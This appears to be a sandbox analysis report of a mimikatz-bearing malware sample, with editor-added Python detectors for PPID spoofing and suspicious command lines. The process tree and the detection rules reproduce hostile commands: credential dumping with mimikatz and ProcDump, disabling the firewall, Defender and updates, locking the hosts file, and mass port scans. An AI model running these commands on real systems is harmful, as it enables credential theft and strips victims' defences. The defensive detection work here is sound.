PID 3344 (wpcap.exe) wrote to memory of 800 (net.exe), x3
PID 800 (net.exe) wrote to memory of 2468 (net1.exe), x3
PID 3344 (wpcap.exe) wrote to memory of 2624 (net.exe), x1
Processes
(Each process line reads: PID, image path | command line. Indentation gives the depth in the tree; the "- " lines beneath a process are its behaviour flags.)

PID 1784  C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe
  PID 1820  C:\Windows\TEMP\irlfzpltl\dlbkbn.exe | "C:\Windows\TEMP\irlfzpltl\dlbkbn.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

PID 2148  C:\Users\Admin\AppData\Local\Temp\2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe | "C:\Users\Admin\AppData\Local\Temp\2024-04-10_a9114bc30a0279a8562dd775a2a34f35_hacktools_icedid_mimikatz.exe"
  - Drops file in Windows directory
  - Suspicious behavior: RenamesItself
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID 2696  C:\Windows\SysWOW64\cmd.exe | cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ibimzzri\puelpci.exe
    - Suspicious use of WriteProcessMemory
    PID 688  C:\Windows\SysWOW64\PING.EXE | ping 127.0.0.1 -n 5
      - Runs ping.exe
    PID 768  C:\Windows\ibimzzri\puelpci.exe | C:\Windows\ibimzzri\puelpci.exe
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx

PID 4432  C:\Windows\ibimzzri\puelpci.exe | C:\Windows\ibimzzri\puelpci.exe
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in Drivers directory
  - Sets file execution options in registry
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID 1860  C:\Windows\SysWOW64\cmd.exe | cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    - Suspicious use of WriteProcessMemory
    PID 4356  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 4248  C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    PID 4740  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 3288  C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    PID 1536  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 4236  C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  PID 3812  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static del all
  PID 4736  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add policy name=Bastards description=FuckingBastards
  PID 3596  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filteraction name=BastardsList action=block
  PID 4068  C:\Windows\SysWOW64\cmd.exe | cmd /c C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe /S
    - Suspicious use of WriteProcessMemory
    PID 3344  C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe | C:\Windows\btlbpeceu\hnkiaiely\wpcap.exe /S
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Loads dropped DLL
      - Drops file in System32 directory
      - Drops file in Program Files directory
      - Suspicious use of WriteProcessMemory
      PID 2628  C:\Windows\SysWOW64\net.exe | net stop "Boundary Meter"
        - Suspicious use of WriteProcessMemory
        PID 2224  C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "Boundary Meter"
      PID 3744  C:\Windows\SysWOW64\net.exe | net stop "TrueSight Meter"
        - Suspicious use of WriteProcessMemory
        PID 3684  C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "TrueSight Meter"
      PID 800  C:\Windows\SysWOW64\net.exe | net stop npf
        - Suspicious use of WriteProcessMemory
        PID 2468  C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop npf
      PID 2624  C:\Windows\SysWOW64\net.exe | net start npf
        PID 1768  C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 start npf
  PID 836  C:\Windows\SysWOW64\cmd.exe | cmd /c net start npf
    PID 4708  C:\Windows\SysWOW64\net.exe | net start npf
      PID 1440  C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 start npf
  PID 2988  C:\Windows\SysWOW64\cmd.exe | cmd /c net start npf
    PID 2928  C:\Windows\SysWOW64\net.exe | net start npf
      PID 3632  C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 start npf
  PID 4608  C:\Windows\SysWOW64\cmd.exe | cmd /c C:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\btlbpeceu\hnkiaiely\Scant.txt
    PID 2948  C:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exe | C:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\btlbpeceu\hnkiaiely\Scant.txt
      - Executes dropped EXE
      - Loads dropped DLL
  PID 3936  C:\Windows\SysWOW64\cmd.exe | cmd /c C:\Windows\btlbpeceu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\btlbpeceu\Corporate\log.txt
    - Drops file in Windows directory
    PID 3964  C:\Windows\btlbpeceu\Corporate\vfshost.exe | C:\Windows\btlbpeceu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
  PID 2104  C:\Windows\SysWOW64\cmd.exe | cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tbimbbnti" /ru system /tr "cmd /c C:\Windows\ime\puelpci.exe"
    PID 228  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 1912  C:\Windows\SysWOW64\schtasks.exe | schtasks /create /sc minute /mo 1 /tn "tbimbbnti" /ru system /tr "cmd /c C:\Windows\ime\puelpci.exe"
      - Creates scheduled task(s)
  PID 2040  C:\Windows\SysWOW64\cmd.exe | cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zzyqhbinn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F"
    PID 2044  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 4872  C:\Windows\SysWOW64\schtasks.exe | schtasks /create /sc minute /mo 1 /tn "zzyqhbinn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F"
      - Creates scheduled task(s)
  PID 2384  C:\Windows\SysWOW64\cmd.exe | cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pgncswiue" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F"
    PID 2296  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 2324  C:\Windows\SysWOW64\schtasks.exe | schtasks /create /sc minute /mo 1 /tn "pgncswiue" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F"
      - Creates scheduled task(s)
  PID 4376  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  PID 4536  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  PID 2088  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  PID 1748  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static set policy name=Bastards assign=y
  PID 2612  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  PID 5004  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 804 C:\Windows\TEMP\btlbpeceu\804.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 3308  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  PID 4252  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  PID 3144  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static set policy name=Bastards assign=y
  PID 3044  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  PID 4020  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  PID 5036  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  PID 1380  C:\Windows\SysWOW64\netsh.exe | netsh ipsec static set policy name=Bastards assign=y
  PID 2884  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 412 C:\Windows\TEMP\btlbpeceu\412.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 4284  C:\Windows\SysWOW64\cmd.exe | cmd /c net stop SharedAccess
    PID 5016  C:\Windows\SysWOW64\net.exe | net stop SharedAccess
      PID 220  C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop SharedAccess
  PID 3100  C:\Windows\SysWOW64\cmd.exe | cmd /c netsh firewall set opmode mode=disable
    PID 4356  C:\Windows\SysWOW64\netsh.exe | netsh firewall set opmode mode=disable
      - Modifies Windows Firewall
  PID 2660  C:\Windows\SysWOW64\cmd.exe | cmd /c netsh Advfirewall set allprofiles state off
    PID 1732  C:\Windows\SysWOW64\netsh.exe | netsh Advfirewall set allprofiles state off
      - Modifies Windows Firewall
  PID 2200  C:\Windows\SysWOW64\cmd.exe | cmd /c net stop MpsSvc
    PID 1612  C:\Windows\SysWOW64\net.exe | net stop MpsSvc
      PID 4664  C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop MpsSvc
  PID 2540  C:\Windows\SysWOW64\cmd.exe | cmd /c net stop WinDefend
    PID 1428  C:\Windows\SysWOW64\net.exe | net stop WinDefend
      PID 5012  C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop WinDefend
  PID 3748  C:\Windows\SysWOW64\cmd.exe | cmd /c net stop wuauserv
    PID 3584  C:\Windows\SysWOW64\net.exe | net stop wuauserv
      PID 4816  C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop wuauserv
  PID 4728  C:\Windows\SysWOW64\cmd.exe | cmd /c sc config MpsSvc start= disabled
    PID 3788  C:\Windows\SysWOW64\sc.exe | sc config MpsSvc start= disabled
      - Launches sc.exe
  PID 2044  C:\Windows\SysWOW64\cmd.exe | cmd /c sc config SharedAccess start= disabled
    PID 3400  C:\Windows\SysWOW64\sc.exe | sc config SharedAccess start= disabled
      - Launches sc.exe
  PID 4936  C:\Windows\SysWOW64\cmd.exe | cmd /c sc config WinDefend start= disabled
    PID 4536  C:\Windows\SysWOW64\sc.exe | sc config WinDefend start= disabled
      - Launches sc.exe
  PID 2296  C:\Windows\SysWOW64\cmd.exe | cmd /c sc config wuauserv start= disabled
    PID 3156  C:\Windows\SysWOW64\sc.exe | sc config wuauserv start= disabled
      - Launches sc.exe
  PID 2088  C:\Windows\TEMP\xohudmc.exe | C:\Windows\TEMP\xohudmc.exe
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetWindowsHookEx
  PID 4256  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 1784 C:\Windows\TEMP\btlbpeceu\1784.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 2376  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2432 C:\Windows\TEMP\btlbpeceu\2432.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 1960  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2596 C:\Windows\TEMP\btlbpeceu\2596.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 1420  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2728 C:\Windows\TEMP\btlbpeceu\2728.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 4984  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3192 C:\Windows\TEMP\btlbpeceu\3192.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 1112  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3928 C:\Windows\TEMP\btlbpeceu\3928.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 224  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 4044 C:\Windows\TEMP\btlbpeceu\4044.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 4376  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 896 C:\Windows\TEMP\btlbpeceu\896.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 3132  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 1108 C:\Windows\TEMP\btlbpeceu\1108.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 2200  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3312 C:\Windows\TEMP\btlbpeceu\3312.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 4564  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2480 C:\Windows\TEMP\btlbpeceu\2480.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 4816  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 4152 C:\Windows\TEMP\btlbpeceu\4152.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 4660  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3120 C:\Windows\TEMP\btlbpeceu\3120.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 3128  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 3828 C:\Windows\TEMP\btlbpeceu\3828.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 4252  C:\Windows\TEMP\btlbpeceu\tvfbneign.exe | C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 2896 C:\Windows\TEMP\btlbpeceu\2896.dmp
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
  PID 4068  C:\Windows\SysWOW64\cmd.exe | cmd.exe /c C:\Windows\btlbpeceu\hnkiaiely\scan.bat
    PID 2328  C:\Windows\btlbpeceu\hnkiaiely\blitiliem.exe | blitiliem.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
      - Executes dropped EXE
      - Drops file in Windows directory
  PID 100  C:\Windows\SysWOW64\cmd.exe | cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    PID 1716  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 1428  C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    PID 4504  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 3332  C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    PID 4228  C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    PID 1972  C:\Windows\SysWOW64\cacls.exe | cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

PID 1748  C:\Windows\SysWOW64\pujbqc.exe | C:\Windows\SysWOW64\pujbqc.exe
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

PID 2148  C:\Windows\system32\cmd.EXE | C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F
  PID 1908  C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  PID 2164  C:\Windows\system32\cacls.exe | cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F

PID 1216  C:\Windows\system32\cmd.EXE | C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F
  PID 4740  C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  PID 3556  C:\Windows\system32\cacls.exe | cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F

PID 4656  C:\Windows\system32\cmd.EXE | C:\Windows\system32\cmd.EXE /c C:\Windows\ime\puelpci.exe
  PID 4460  C:\Windows\ime\puelpci.exe | C:\Windows\ime\puelpci.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

PID 2660  C:\Windows\system32\cmd.EXE | C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F
  PID 3888  C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  PID 2952  C:\Windows\system32\cacls.exe | cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F

PID 4608  C:\Windows\system32\cmd.EXE | C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F
  PID 4368  C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  PID 3936  C:\Windows\system32\cacls.exe | cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F

PID 3256  C:\Windows\system32\cmd.EXE | C:\Windows\system32\cmd.EXE /c C:\Windows\ime\puelpci.exe
  PID 464  C:\Windows\ime\puelpci.exe | C:\Windows\ime\puelpci.exe
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
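The tree above shows dlbkbn.exe (PID 1820) as a child of spoolsv.exe (PID 1784), while the process the sandbox flagged for NtCreateUserProcessOtherParentProcess is puelpci.exe (PID 4432): the parent shown is the one the creator asked the kernel to record, not the creator itself. The following is an added example written by the editor, not code from the sandbox or the sample, of the correlation a detection pipeline needs to expose that. It assumes telemetry that records both the PID that issued the create call and the parent PID stored on the new process (the editor's reading of the ETW Microsoft-Windows-Kernel-Process start event, where the header PID is the caller and the payload carries the assigned parent; Sysmon Event ID 1 only records the latter). The events, the `creator_pid` value of 4432 and the `RUNNING` table are constructed from the PIDs in this report.

```python
"""Added example (editor's code, not from the sandbox or the sample): tell the real
creator of a process apart from the parent it reports.

Assumption: the telemetry records both the PID that issued the create call and the
parent PID stored on the new process. Sample events are constructed from the tree.
"""
from dataclasses import dataclass

# Service hosts that never legitimately spawn executables from TEMP or user-writable paths.
SERVICE_HOSTS = {"spoolsv.exe", "svchost.exe", "lsass.exe", "services.exe"}
WRITABLE_PREFIXES = ("c:\\windows\\temp\\", "c:\\users\\", "c:\\programdata\\")


@dataclass(frozen=True)
class ProcStart:
    pid: int
    image: str
    creator_pid: int   # process that made the create call
    parent_pid: int    # parent recorded on the new process (what the tree displays)


@dataclass(frozen=True)
class Finding:
    pid: int
    reason: str
    creator_pid: int
    parent_pid: int


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_ppid_spoofing(events: list[ProcStart], running: dict[int, str]) -> list[Finding]:
    """Return one Finding per suspicious start. `running` maps PIDs that were already
    alive before the events (here spoolsv.exe and puelpci.exe) to their image paths."""
    images = dict(running)
    images.update({e.pid: e.image for e in events})
    findings = []
    for e in events:
        # Rule 1: the caller is not the parent the kernel was told to record.
        if e.creator_pid != e.parent_pid:
            findings.append(Finding(e.pid, "creator differs from reported parent",
                                    e.creator_pid, e.parent_pid))
        # Rule 2: works even without a creator PID. A print spooler launching a
        # binary out of C:\Windows\TEMP is wrong regardless of how it got there.
        parent_image = basename(images.get(e.parent_pid, ""))
        if parent_image in SERVICE_HOSTS and e.image.lower().startswith(WRITABLE_PREFIXES):
            findings.append(Finding(e.pid, f"{parent_image} launching from writable path",
                                    e.creator_pid, e.parent_pid))
    return findings


# Constructed from the tree: spoolsv.exe (1784) and puelpci.exe (4432) already running.
RUNNING = {1784: "C:\\Windows\\System32\\spoolsv.exe",
           4432: "C:\\Windows\\ibimzzri\\puelpci.exe"}

SAMPLE_EVENTS = [
    # dlbkbn.exe is displayed under spoolsv.exe, but puelpci.exe (4432) is the process
    # the sandbox flagged for NtCreateUserProcessOtherParentProcess. The creator_pid
    # value is the editor's reading of that flag, not a field the report prints.
    ProcStart(1820, "C:\\Windows\\TEMP\\irlfzpltl\\dlbkbn.exe", creator_pid=4432, parent_pid=1784),
    # An honest child: cmd.exe spawned directly by puelpci.exe.
    ProcStart(1860, "C:\\Windows\\SysWOW64\\cmd.exe", creator_pid=4432, parent_pid=4432),
]

if __name__ == "__main__":
    for f in detect_ppid_spoofing(SAMPLE_EVENTS, RUNNING):
        print(f"pid {f.pid}: {f.reason} (creator {f.creator_pid}, parent {f.parent_pid})")
```

Rule 2 is the fallback for environments that only have Sysmon-style parent data: it cannot name the real creator, but a service host that "launches" something out of `C:\Windows\TEMP` is enough to open a case. Rule 1 is what turns the case into an attribution, which is why the creator PID is worth collecting.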
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (1): Disable or Modify System Firewall (1)
- Modify Registry (1)
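The ATT&CK mapping above only lists what the sandbox's own signatures matched; the process tree carries more that a detection engineer would want rules for: the `-accepteula -mp <pid> <file>.dmp` invocations (ProcDump's syntax, run here against seventeen PIDs in a row), the `privilege::debug sekurlsa::logonpasswords` arguments to a renamed mimikatz, the `cacls ... /T /D SYSTEM` lockdown of the hosts file, the IPsec static policy blocking 135/139/445, the firewall and Defender shutdown, the every-minute SYSTEM scheduled tasks, and two scanners (a masscan-style `-p 80 <range> --rate=1024 -oJ` line and a `TCP <start> <end> 7001 512 /save` line). The block below is an added example by the editor, not part of the report or of any vendor rule set: the command lines from the tree run through a small rule table. The regexes and the technique IDs are the editor's mapping, tuned to the exact lines on this page; the sample events are constructed from those lines plus two benign ones.

```python
"""Added example (editor's code, not from the sandbox): command-line triage rules for
the behaviours in this report. Technique IDs are the editor's ATT&CK mapping."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str          # ATT&CK technique ID (editor's mapping, an assumption)
    pattern: re.Pattern


RULES = [
    # ProcDump's "-accepteula -mp <pid> <file>.dmp" writes a MiniPlus dump of a process;
    # the tree shows it run against many PIDs in a row, i.e. hunting for lsass.
    Rule("procdump-style process memory dump", "T1003.001",
         re.compile(r"-accepteula\s+-mp\s+\d+\s+\S+\.dmp", re.I)),
    # Mimikatz module syntax on a renamed binary (vfshost.exe here).
    Rule("mimikatz command-line modules", "T1003.001",
         re.compile(r"(privilege::debug|sekurlsa::|lsadump::)", re.I)),
    # Deny users, administrators and SYSTEM on the hosts file so nobody can repair it.
    Rule("hosts file ACL lockdown", "T1222.001",
         re.compile(r"cacls\s+\S*drivers\\etc\\hosts\s+/T\s+/D\s+(users|administrators|system)", re.I)),
    # IPsec static policy blocking inbound 135/139/445: locks other intruders out of SMB/RPC.
    Rule("netsh ipsec static block policy", "T1562.004",
         re.compile(r"netsh\s+ipsec\s+static\s+add\s+(filter|filteraction|rule|policy)", re.I)),
    Rule("windows firewall disabled", "T1562.004",
         re.compile(r"netsh\s+(advfirewall\s+set\s+allprofiles\s+state\s+off|firewall\s+set\s+opmode\s+mode=disable)", re.I)),
    Rule("security/update service stopped or disabled", "T1562.001",
         re.compile(r"(net\s+stop|sc\s+config)\s+(WinDefend|MpsSvc|SharedAccess|wuauserv)\b", re.I)),
    # /sc minute /mo 1 as SYSTEM is a re-spawn loop, not a maintenance task.
    Rule("every-minute SYSTEM scheduled task", "T1053.005",
         re.compile(r"schtasks\s+/create\b.*\s/sc\s+minute\b.*\s/ru\s+system\b", re.I)),
    # masscan-style "-p <port> <ip>-<ip> --rate=<n>" and the older
    # "<tool> TCP <start> <end> <port> <threads> /save" scanner syntax.
    Rule("internet-wide port scan", "T1046",
         re.compile(r"(-p\s+\d+\s+\d+(\.\d+){3}-\d+(\.\d+){3}\s+--rate=\d+"
                    r"|\bTCP\s+\d+(\.\d+){3}\s+\d+(\.\d+){3}\s+\d+\s+\d+\s+/save)", re.I)),
]


def classify(cmdline: str) -> list[tuple[str, str]]:
    """Return (technique, rule name) pairs for every rule the command line matches."""
    return [(r.technique, r.name) for r in RULES if r.pattern.search(cmdline)]


def triage(events: list[dict]) -> dict[int, list[tuple[str, str]]]:
    """Run the rules over process-creation events; keep only PIDs that hit something."""
    hits = {}
    for ev in events:
        found = classify(ev["cmdline"])
        if found:
            hits[ev["pid"]] = found
    return hits


def techniques_seen(events: list[dict]) -> set[str]:
    return {t for found in triage(events).values() for t, _ in found}


# Constructed sample: command lines copied from the process tree, plus two benign ones.
SAMPLE_EVENTS = [
    {"pid": 688,  "cmdline": "ping 127.0.0.1 -n 5"},
    {"pid": 3964, "cmdline": r"C:\Windows\btlbpeceu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit"},
    {"pid": 5004, "cmdline": r"C:\Windows\TEMP\btlbpeceu\tvfbneign.exe -accepteula -mp 804 C:\Windows\TEMP\btlbpeceu\804.dmp"},
    {"pid": 4248, "cmdline": r"cacls C:\Windows\system32\drivers\etc\hosts /T /D users"},
    {"pid": 4376, "cmdline": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP"},
    {"pid": 1732, "cmdline": "netsh Advfirewall set allprofiles state off"},
    {"pid": 4536, "cmdline": "sc config WinDefend start= disabled"},
    {"pid": 1912, "cmdline": r'schtasks /create /sc minute /mo 1 /tn "tbimbbnti" /ru system /tr "cmd /c C:\Windows\ime\puelpci.exe"'},
    {"pid": 2948, "cmdline": r"C:\Windows\btlbpeceu\hnkiaiely\nfzqetiti.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\btlbpeceu\hnkiaiely\Scant.txt"},
    {"pid": 2328, "cmdline": "blitiliem.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save"},
    {"pid": 2624, "cmdline": "net start npf"},
]

if __name__ == "__main__":
    for pid, found in sorted(triage(SAMPLE_EVENTS).items()):
        for technique, name in found:
            print(f"pid {pid:<5} {technique:<10} {name}")
```

The rules key on arguments rather than image names because every tool in this tree was renamed (vfshost.exe, tvfbneign.exe, nfzqetiti.exe, blitiliem.exe); the argument syntax is what the operator could not change without rewriting the tool.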
Downloads
-
